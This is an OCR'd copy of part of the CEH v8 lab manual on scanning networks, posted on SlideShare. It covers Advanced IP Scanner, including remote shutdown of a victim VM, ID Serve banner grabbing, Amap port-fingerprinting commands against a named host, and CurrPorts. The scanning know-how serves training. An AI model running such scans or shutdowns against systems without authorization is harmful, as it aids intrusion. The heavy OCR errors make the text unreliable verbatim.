SlideShare a Scribd company logo

Ceh v8 labs module 03 scanning networks

A
Asep Sopyan

Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.

1 of 182
Downloaded 60 times
CEH Lab Manual Scanning Networks Module 03
Module 03 - Scanning Networks Scanning a Target Network Scanninga network refersto a setofproceduresforidentifyinghosts,po/ts, and servicesrunningin a network. Lab Scenario Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization’s systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing and list die direats and vulnerabilities found in an organization’s network and perform port scanning, network scanning, and vulnerability scanning ro identify IP/hostname, live hosts, and vulnerabilities. Lab Objectives The objective of diis lab is to help students in conducting network scanning, analyzing die network vulnerabilities, and maintaining a secure network. You need to perform a network scan to: ■ Check live systems and open ports ■ Perform banner grabbing and OS fingerprinting ■ Identify network vulnerabilities ■ Draw network diagrams of vulnerable hosts Lab Environment 111 die lab, you need: ■ A computer running with Windows Server 2012, Windows Server 2008. Windows 8 or Windows 7 with Internet access ■ A web browser ■ Administrative privileges to run tools and perform scans Lab Duration Time: 50 Minutes Overview of Scanning Networks Building on what we learned from our information gadiering and threat modeling, we can now begin to actively query our victims for vulnerabilities diat may lead to a compromise. We have narrowed down ou1 attack surface considerably since we first began die penetration test widi everydiing potentially in scope. I C O N K E Y Valuable information s Test your knowledge H Web exercise Q Workbook review ZZ7 Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page S5
Module 03 - Scanning Networks Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. 111 fact even a seemingly harmless misconfiguration can be the nuiiing point in a penetration test that gives up the keys to the kingdom. For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then die risk associated with the anonymous read option is minimal. On die other hand, if you are able to read the entire file system using die anonymous FTP account, or possibly even worse, someone lias mistakenly left die customer's trade secrets in die FTP directory that is readable to die anonymous user; this configuration is a critical issue. Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of diem. As we will see in diis module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment. 111 diis module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools. Lab Tasks Pick an organization diat you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you in scanning networks: ■ Scanning System and Network Resources Using Advanced IP Scanner ■ Banner Grabbing to Determine a Remote Target System Using ID Serve ■ Fingerprint Open Ports for Running Applications Using the Amap Tool ■ Monitor TCP/IP Connections Using die CurrPorts Tool ■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012 ■ Explore and Audit a Network Using Nmap ■ Scanning a Network Using die N etScan Tools Pro ■ Drawing Network Diagrams Using LANSurveyor ■ Mapping a Network Using the Friendly Pinger ■ Scanning a Network Using die N essus Tool ■ Auditing Scanning by Using Global Network Inventory ■ Anonymous Browsing Using Proxy Sw itcher TASK 1 Overview L__/ Ensure you have ready a copy of the additional readings handed out for this lab. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page S6
Module 03 - Scanning Networks ■ Daisy Chaining Using Proxy W orkbench ■ HTTP Tunneling Using HTTPort ■ Basic Network Troubleshooting Using the M egaPing ■ Detect, Delete and Block Google Cookies Using G-Zapper ■ Scanning the Network Using the C olasoft P ack et Builder ■ Scanning Devices in a Network Using The Dude Lab Analysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure duough public and free information. P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 87
Module 03 - Scanning Networks Scanning System and Network Resources Using Advanced IP Scanner -AdvancedIP Scanneris afree nefirork scannerthatgivesyon varioustypes of information regardinglocalnehvork computers. Lab Scenario 111 this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities. Lab O bjectives The objective of this lab is to help students perform a local network scan and discover all the resources 011 die network. You need to: ■ Perform a system and network scan ■ Enumerate user accounts ■ Execute remote penetration ■ Gather information about local network computers Lab Environm ent 111 die lab, you need: ■ Advanced IP Scanner located at Z:CEHv8 Module 03 Scanning NetworksScanning Tools Advanced IP Scanner ■ You can also download the latest version of A dvanced IP Scanner from the link http://www.advanced-ip-scanner.com I C O N K E Y / = ‫־‬ Valuable information ✓ Test your knowledge S Web exercise CQWorkbook review l—J Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Q You can also download Advanced IP Scanner from http:/1www.advanced-ip- scanner.com. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 88
Module 03 - Scanning Networks ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows 8 as die attacker (host machine) ■ Another computer running Windows server 2008 as die victim (virtual machine) ■ A web browser widi Internet a cc e ss ■ Double-click ipscan20.msi and follow die wizard-driven installation steps to install Advanced IP Scanner ■ Administrative privileges to run diis tool Lab Duration Time: 20 Minutes O verview of N etw ork Scanning Network scanning is performed to collect information about live system s, open ports, and network vulnerabilities. Gathered information is helpful in determining threats and vulnerabilities 111 a network and to know whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources. Lab Tasks 1. Go to Start by hovering die mouse cursor in die lower-left corner of die desktop FIGURE 1.1:Windows 8- Desktopview 2. Click Advanced IP Scanner from die Start menu in die attacker machine (Windows 8). / 7Advanced IP Scanner works on Windows Server 2003/ Server 2008 and on Windows 7 (32 bit, 64 bit). S TASK 1 Launching Advanced IP Scanner Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 89
Module 03 - Scanning Networks Start Admin ^ Nc m WinRAR Mozilla Firefox Command Prompt i t t Fngago Packet builder 2* Sports Computer tS Microsoft Clip Organizer Advanced IP Scanner m iiilili finance Control Panel Microsoft Office 2010 Upload... • FIGURE 12. Windows 8- Apps 3. The Advanced IP Scanner main window appears. FIGURE 13: TheAdvancedIP Scannermainwindow 4. Now launch die Windows Server 2008 virtual machine (victim’s machine). Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited m With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously. You can wake any machine remotelywith Advanced IP Scanner, if the Wake-on‫־‬LAN feature is supported byyour network card. C E H Lab M anual Page 90
Module 03 - Scanning Networks O jf f lc k 10:09 FM Jiik FIGURE 1.4:ThevictimmachineWindows server2008 5. Now, switch back to die attacker machine (Windows 8) and enter an IP address range in die Select range field. 6. Click die Scan button to start die scan. 7. Advanced IP Scanner scans all die IP addresses within die range and displays the scan results after completion. L__/ You have to guess a range of IP address of victim machine. aRadmin 2.x and 3.x Integration enable you to connect (ifRadmin is installed) to remote computers with just one dick. The status of scan is shown at the bottom left side of the window. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 91
Module 03 - Scanning Networks Advanced IP Scanner File Actions Settings View Heip J►S car' J l IP cr=£k=3 r f t o d id 3 ? f i l : Like us on ■ 1 Facebook 10.0.0.1-10.0.0.10 M A C addressManufacturer Resits | Favorites | rStatus 0 w 10.0.0.1 10.0.a1 Nlctgear, Inc. 00:09:5B:AE:24CC >£*‫ט‬ W IN-MSSELCK4K41 10.0.a2 Dell Inc D0:67:ES:1A:16:36 ® & WINDOWS# 10.0.03 M icro so ft Corporation 00:15:5D:A8:6E:C6 W IN*LXQ N3W R3R9M 10.0.05 M icrosoft Corporation 00:15:5D:A8:&E:03 ® 15 W IN-D39MR5H19E4 10.0.07 Dell Inc D1:3‫׳‬E:D9:C3:CE:2D 5*iv*, 0d« J0, Sunknown FIGURE 1.6:TheAdvancedIP Scannermainwindowafter scanning 8. You can see in die above figure diat Advanced IP Scanner lias detected die victimmachine’s IP address and displays die status as alive 9. Right-click any of die detected IP addresses. It will list Wake-On-LAN. Shut down, and Abort Shut down Advanced IP Scanner‫־‬5 Fie Actions Settings View Helo Like us on FacebookWi*sS:ip c u u *IIScan 10.0.0.1-10.0.0.10 Resuts Favorites | MAC addresstorufa ctu re r nN am eStatus 0G:09:5B:AE:24CC D0t67:E5j1A:16«36 00:15:‫צ‬U:A8:ofc:Ot> 00:15:SD:A8:6E:03 CW:BE:D9:C3:CE:2D Netgear. Inc Microsoft Corporation M icro so ft C orporation Dell Inc 10.0.011 !Add to ‘Favorites' Rescan selected Sive selected... W dke‫־‬O n ‫־‬LA N Shut dcwn... A bort sh u t d cw n R adrnir 10.0.0.1 IHLMItHMM, — W INDO W S8 t*p‫׳‬ore W IN-LXQN3W R3 C o p y W IN‫־‬ D39MR5HL< h i 5 alive. 0 dead, 5 unknow n FIGURE 1.7:TheAdvancedIP Scanner mainwindowwithAlive Host list 10. The list displays properties of the detected computer, such as IP address. Name, MAC, and NetBIOS information. 11. You can forcefully Shutdown, Reboot, and Abort Shutdown die selected victim machine/IP address Lists of computers saving and loading enable you to perform operations with a specific list of computers.Just save a list of machines you need and Advanced IP Scanner loads it at startup automatically. m Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few dicks. M T A S K 2 Extract Victim’s IPAddress Info aWake-on-LAN: You can wake any machine remotely with Advanced IP Scanner, if Wake-on-LAN feature is supported by your network card. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 92
Module 03 - Scanning Networks ‫״‬m s i * Like us on Facebookw 3 MAC addressjrer 00;C9;5B:AE:24;CC D0:67:E5:1A:16:36 Ition 00:15:3C:A0:6C:06 Ition 00:I5:5D:A8:6E:03 D4:BE D$:C3:CE:2D Shutdown options r Use V/jndo'AS autheritifcation Jser narre: Dcss*rord: rneoct (sec): [60 Message: I” Forcedshjtdown f " Reooot & File Actions Settings View Help Scan J ! ] .■ ] 110.0.0.1-100.0.10 Results | Favorites | Status Name ® a 100.0.1 WIN-MSSELCK4K41 WIND0WS8 $ WIN-LXQN3WR3R9M » a WIN-D39MR5HL9E4 S0Jrc, Odcad, 5 unknown Winfingerprint Input Options: ■ IP Range (Netmask and Inverted Netmask supported) IP ListSmgle Host Neighborhood FIGURE 1.8:TheAdvanced IP ScannerComputer propertieswindow 12. Now you have die IP address. Name, and other details of die victim machine. 13. You can also try Angry IP scanner located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksPing Sw eep ToolsAngry IP Scanner It also scans the network for machines and ports. Lab Analysis Document all die IP addresses, open ports and dieii running applications, and protocols discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Advanced IP Scanner Scan Information: ■ IP address ■ System name ■ MAC address ■ NetBIOS information ■ Manufacturer ■ System status Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 93
Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine and evaluate the IP addresses and range of IP addresses. Internet Connection Required es□ Y Platform Supported 0 Classroom 0 No 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 94
Module 03 - Scanning Networks BannerGrabbing to Determine a Remote Target System using ID Serve IDS Serveis usedto identify the make, model, and versionof any website'sserver sofhrare. Lab Scenario 111die previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer flow, SQL injection, and web application 011 a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them and crack into die network and cause server damage. Therefore, it is extremely important for penetration testers to be familiar widi banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine die role of servers within a network. 111 diis lab, you will learn die banner grabbing technique to determine a remote target system using ID Serve. Lab Objectives The objective of diis lab is to help students learn to banner grabbing die website and discover applications running 011 diis website. 111 diis lab you will learn to: ■ Identify die domain IP address ■ Identify die domain information Lab Environment To perform die lab you need: ■ ID Server is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsID Serve ICON KEY Valuable information y* Test your knowledge Web exercise O Workbook review O Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 95
Module 03 - Scanning Networks ■ You can also download the latest version of ID Serve from the link http:/ / www.grc.com/id/idserve.htm ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Double-click idserve to run ID Serve ■ Administrative privileges to run die ID Serve tool ■ Run this tool on Windows Server 2012 Lab Duration Time: 5 Minutes Overview of ID Serve ID Serve can connect to any server port on any domain or IP address, then pull and display die server's greeting message, if any, often identifying die server's make, model, and version, whether it's for FTP, SMTP, POP, NEW’S, or anything else. Lab Tasks 1. Double-click idserve located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsID Serve 2. 111die main window of ID Serve show in die following figure, select die Sever Query tab TASK 1 Identify w ebsite server information ' - r oID Serve0 Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright(c) 2003 byGibsonResearchCap. ID Serve Background Server Query | Q&A/Help Enter 01 copy / pasteanInternet server URL 0*IP address here(example wwwrmcrosoft com) ri When an Internet URL or IPhas been providedabove ^ press thisbutton to rwtiateaqueryof the speahed server Query TheServerr! Server The server identified<se* as ^4 E*itgoto ID Serve webpageCopy If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP FIGURE 21: MainwindowofID Serve 3. Enter die IP address or URL address in Enter or Copy/paste an Internal server URL or IP address here: Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 96
Module 03 - Scanning Networks ID Server© Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright(c) 2003 byGibsonResearchCorp. ID Serve Background Server Query I Q & A /tjelp Enter or copy I pasteanInternet serve* URL or IPaddress here(example wwwrmcrosoft com) ^ |www certifie d h a cke r com[ When an Internet URL 0*IPhasbeen providedabove, press thisbutton 10 initiateaquery01 the specfod serverQuery TheServer Server query processing (% The server identifiedilsef as EjjitGotoID Serveweb pageCopy ID Serve can accept the URL or IP as a command-line parameter FIGURE 22 Enteringdie URLfor query 4. Click Query The Server; it shows server query processed information ’ - r ° ] - ‫׳‬ID Serve Exit Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright (c) 2003 byGibsonResearchCofp ID Serve Background Server Query | Q&A/Help Enter or copy / pasteanInternet server URL or IPaddress here(example www m»crosott com) |w w w . c e rtifie d h a c ke r.c o m |<T When an Internet URL 0* IPhasbeen providedabove, pressthisbutton toinitiateaqueryof thespeeded serverQuery The Server r2 [ Server query processing Initiating server query Looking up IP address for domain www certifiedhacker com The IP address for the domain is 202.75 54 101 Connecting to the server on standard HTTP port: 80 Connected] Requesting the server's default page The server identfied itself as M ic r o soft-11 S/6.0a Goto ID Serveweb pageCopy Q ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information. FIGURE 23: Serverprocessedinformation Lab Analysis Document all the IP addresses, their running applications, and die protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 97
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP address: 202.75.54.101 Server Connection: Standard H T1P port: 80 Response headers returned from server: ID Serve ■ H T T P /1.1 200 ■ Server: Microsoft-IIS/6.0 ■ X-Powered-By: PHP/4.4.8 ■ Transfer-Encoding: chunked ■ Content-Type: text/html P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine what protocols ID Serve apprehends. 2. Check if ID Serve supports https (SSL) connections. Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 98
Module 03 - Scanning Networks Fingerprinting Open Ports Using the Amap Tool .-bnap determinesapplications running on each openport. Lab Scenario Computers communicate with each other by knowing die IP address in use and ports check which program to use when data is received. A complete data transfer always contains the IP address plus the port number required. 111 the previous lab we found out that die server connection is using a Standard HTTP port 80. If an attacker finds diis information, he or she will be able to use die open ports for attacking die machine. 111this lab, you will learn to use the Amap tool to perform port scanning and know exacdy what applications are running on each port found open. Lab Objectives The objective of diis lab is to help students learn to fingerprint open ports and discover applications 11inning on diese open ports. hi diis lab, you will learn to: ■ Identify die application protocols running on open ports 80 ■ Detect application protocols Lab Environment To perform die lab you need: ■ Amap is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsVAMAP ■ You can also download the latest version of AMAP from the link http: / / www.thc.org dic-amap. ■ If you decide to download the latest version, then screenshots shown in the lab might differ ICON KEY 2 ^Valuable information Test vour knowledge g Web exercise Q Workbook review C 5 Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 99
Module 03 - Scanning Networks ■ A computer running Web Services enabled for port 80 ■ Administrative privileges to run die Amap tool ■ Run diis tool on Windows Server 2012 Lab Duration Time: 5 Minutes Overview of Fingerprinting Fingerprinting is used to discover die applications running on each open port found 0x1 die network. Fingerprinting is achieved by sending trigger packets and looking up die responses in a list of response strings. Lab Tasks 1. Open die command prompt and navigate to die Amap directory. 111diis lab die Amap directory is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsAMAP 2. Type amap www.certifiedhacker.com 80, and press Enter. Administrator: Command Prompt33 [D :CEH~ToolsCEH u8 M odule 03 S c a n n i n g N e t w o r k B a n n e r G r a b b in g T oolsA M A P>anap uw [ w . c o r t i f i o d h a c h e r . c o m 80 Anap v 5 . 2 <w w w . t b c . o r g / t h c - a m a p > s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 4 2 - MAPPING n ode J n i d e n t i f i e d p o r t s : 2 0 2 . ? 5 . 5 4 . 1 0 1 : 8 0 / t c p < t o t a l 1 > . *map v 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 5 3 D :C E H -T oolsC E H v8 M odule 0 3 S c a n n i n g N e t w o r k B a n n e r G r a b b in g ToolsAMAP> FIGURE 3.1:Amapwithhostname www.ce1tifiedl1acke1.comwith Port SO 3. You can see die specific application protocols running 011 die entered host name and die port 80. 4. Use die IP address to check die applications running on a particular port. 5. 111die command prompt, type die IP address of your local Windows Server 2008(virtual machine) amap 10.0.0.4 75-81 (local Windows Server 2008) and press Enter (die IP address will be different in your network). 6. Try scanning different websites using different ranges of switches like amap www.certifiedhacker.com 1-200 a t TAS K 1 Identify Application Protocols Running on Port 80 Syntax: amap [-A| ‫־‬ B|-P |-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [‫־‬i <£ile>] [target port [port]...] ✓ For Amap options, type amap -help. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 100
Module 03 - Scanning Networks ‫ד‬ FIGURE 3.2: AmapwithIP addressandwithrangeof switches 73-81 Lab Analysis Document all die IP addresses, open ports and their running applications, and die protocols you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Identified open port: 80 WebServers: ■ http-apache2‫־‬ ■ http-iis ■ webmin Amap U nidentified ports: ■ 10.0.0.4:75/tcp ■ 10.0.0.4:76/tcp ■ 10.0.0.4:77/tcp ■ 10.0.0.4:78/tcp ■ 10.0.0.4:79/tcp ■ 10.0.0.4:81/tcp Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited D :C E H -T oolsC EH u8 Module 03 S c a n n i n g N etw o r k B a n n e r G r a b b in g ToolsAMAP>amap I f . 0 . 0 . 4 7 5 - 8 1 laroap 0 5 . 2 <w w w . t h c . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 1 - MAPPING mode P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - a p a c h e - 2 W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 6 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b le ) t o 1 0 . 0 . 0 . 4 : 7 5 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 7 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t ( u n r e a c h a b l e ) t o 1 0 . 0 . 0 . 4 : 7 8 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 9 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 8 1 / t c p , d i s a b l i n g p o r t <EUN KN> P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - i i s P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s webmin U n i d e n t i f i e d p o r t s : 1 0 . 0 . 0 . 4 : 7 5 / t c p 1 0 . 0 . 0 . 4 : 7 6 / t c p 1 0 . 0 . 0 . 4 : 7 7 / t c p 1 0 . 0 . 0 . 4 : 7 8 / k c p 1 0 . 0 . 0 . 4 : 7 9 / t c p 1 0 . 0 . 0 . 4 : 8 1 / t c p < t o t a l 6 > . Linap 0 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 4 b :C E H -T o o lsC E H v 8 Module 03 S c a n n i n g N etw orkNBanner G r a b b in g ToolsAMAP> Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS C E H Lab M anual Page 101
Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Execute the Amap command for a host name with a port number other than 80. 2. Analyze how die Amap utility gets die applications running on different machines. 3. Use various Amap options and analyze die results. Internet Connection Required □ Noes0 Y Platform Supported □ iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 102
Module 03 - Scanning Networks Monitoring TCP/IP Connections Using the CurrPorts Tool CurrPorts is netirork monitoringsoft!rare thatdisplaysthe list of allcurrently openedTCP/IP and UDPports onyourlocalcomputer. Lab Scenario 111 the previous lab you learned how to check for open ports using the Amap tool. As an ethical h acker and penetration tester, you must be able to block such attacks by using appropriate firewalls or disable unnecessary services running 011 the computer. You already know that the Internet uses a software protocol named TCP/ IP to format and transfer data. A11 attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and to the packet payloads with which he or she can hijack the connection. As the attacker has all die information 011 the network, he or she can create false packets in the TCP connection. As a netw ork administrator., your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the establish ed IP ad d resses of the server using the CurrPorts tool. Lab O bjectives The objective of diis lab is to help students determine and list all the TCP/IP and UDP ports of a local computer. 111 in this lab, you need to: ■ Scan the system for currently opened TCP/IP and UDP ports ■ Gather information 011 die ports and p ro cesses that are opened ■ List all the IP ad d resses that are currendy established connections ■ Close unwanted TCP connections and kill the process that opened the ports I CON KEY Valuable information Test your knowledge w Web exercise m Workbook review HU Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 103
Module 03 - Scanning Networks Lab Environment To perform the lab, you need: ■ CurrPorts located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsCurrPorts ■ You can also download the latest version of CurrPorts from the link http: / / www.nirsoft.11e t/utils/cports.html ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running W indows Server 2012 ■ Double-click cp o rts.exe to run this tool ■ Administrator privileges to run die CurrPorts tool Lab Duration Time: 10 Minutes aYou can download CuuPorts tool from http://www.nirsoft.net. Overview Monitoring TCP/IP Monitoring TCP/IP ports checks if there are multiple IP connections established Scanning TCP/IP ports gets information on all die opened TCP and UDP ports and also displays all established IP addresses on die server. Lab Tasks The CurrPorts utility is a standalone executable and doesn’t require any installation process or additional DLLs (Dynamic Link Library). Extract CurrPorts to die desired location and double click cports.exe to launch. 1. Launch Currports. It autom atically displays the process name, ports, IP and remote addresses, and their states. TASK 1 ‫י‬*1‫״‬1‫־‬rCurrPorts File Edit View Option* Help x S D ® v ^ ! t a e r 4* a -* ProcessNa.. Proces... Protocol Local... Loc.. Local Address Rem... Rem... Rercte Address Remote Host Nam (T enroare.ere 2 m TCP 4119 10.0.0.7 80 http 173.194.36.26 bcm04501-in‫־‬f26.1 f ct1rome.ere 2988 TCP 4120 10.0.0.7 80 http 173.194.3626 bom04s01-in-f26.1 chrome.e5re 2988 TCP 4121 10.0.0.7 80 http 173.194.3626 bom04501‫־‬in‫־‬f26.1 f ehrome.ere 2 m TCP 4123 10.0.0.7 80 http 215720420 a23-57-204-20.dep CTchrome.«e 2 m TCP 414S 10.0.0.7 443 https 173.1943626 bomOdsOI-in-f26.1 ^ firtfc x ere 1368 TCP 3981 127.0.0.1 3982 12700.1 WIN-D59MR5HL9F £fir«fcx«x• 1368 TCP 3982 127.0.0.1 3981 12700.1 WIN-D39MR5HL9E (£fir«fcx «(« 1368 TCP 4013 10.007 443 https 173.1943622 bom01t01‫־‬in-f22.1 fircfcx.cxc 1368 TCP 4163 1000.7 443 httpj 173.19436.15 bom04!01•in-flS.1 f 1rcfcxc.cc 1368 TCP 4166 100.0.7 443 httpj 173.194360 bcm04501-in-f0.1« firefcx c.<c 1368 TCP 4168 100.0.7 443 http; 74.125234.15 gra03s05in-f15.1e s, httpd.exe 1000 TCP 1070 00.0.0 0.0.0.0 thttpd.exe 1800 TCP 1070 = Qlsass.occ 564 TCP 1028 0.0.0.0 0.0.0.0 3 l» 5 5 a e 564 TCP 1028 = ____ »_____ <1 ■>1 T > NirSoft F reew are. ht1p;/AnrA«v.rirsoft.net79 ~ctal Ports. 21 RemoteConnections. 1Selected Discover TCP/IP Connection C E H Lab M anual Page 104 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks FIGURE 4.1:Tlie CuaPoits mainwindowwith allprocesses, ports, and IP addresses 2. CiirrPorts lists all die processes and their IDs, protocols used, local and remote IP address, local and remote ports, and remote host names. 3. To view all die reports as an HTML page, click View ‫־‬> HTML Reports ‫־‬All Items. M °- x ‫י‬CurrPorts Remote Host Nam * bcm Q 4s0l-in‫־‬f26.1 bcm 04s0l-in-f26.1 bcm04s01 -in-f26.1 a23-57-204-20.dep S bom04501-in‫־‬f26.1 W IN-D39MR5HL9E W IN-D39MR5HL9E bem04s01-in-f22.1 bom04i01‫־‬in*f15.1 bom04s0l*in-f0.1< gruC3s05-1n‫־‬fl5.1e Remote Address 173.1943526 173.194.3526 173.194.3526 23.5720420 173.194.3526 127.0.0.1 127.0.0.1 173.1943622 173.19436.15 173.19436.0 741252*4.15 0.0.0.0 0.0.0.0 Rem.. http http http http https https https https https 443 3962 3981 443 443 443 443 Address ).7 ).7 ).7 ).7 ).7 .0.1 .0.1 ShowGrid Lines ShowTooltips Mark Odd/Even Rows HTML Report ‫־‬ All I'errs F5 --- TV.V,0.7 10.0.0.7 10.0.0.7 100.0.7 o.ao.o aaao File Edit I View | O ptions Help X B 1 Process KJa 1 ^ I chrom e. C * ch ro m e l ^ chrom e. C * chrom e. ^ chrom c. (£ fir 